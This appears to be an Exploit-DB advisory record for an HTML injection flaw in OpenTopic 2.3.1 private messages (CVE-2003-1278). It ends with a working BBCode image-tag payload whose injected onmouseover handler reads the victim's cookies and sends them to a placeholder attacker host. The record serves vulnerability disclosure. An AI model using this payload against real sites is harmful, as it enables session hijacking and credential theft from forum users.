OpenTopic 2.3.1 - Private Message HTML Injection Vulnerability

2003-01-06T00:00:00
ID EDB-ID:22125
Type exploitdb
Reporter frog
Modified 2003-01-06T00:00:00

Description

OpenTopic 2.3.1 Private Message HTML Injection Vulnerability. CVE-2003-1278. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/6523/info

A HTML injection vulnerability has been reported for OpenTopic. The vulnerability exists because OpenTopic does not sufficiently sanitize HTML code from private message posts.

When a victim user views any private messages, any malicious HTML code will be executed in the web browser in the security context of the site.

Exploitation may allow for theft of cookie-based authentication credentials or other attacks. 

[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="
a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]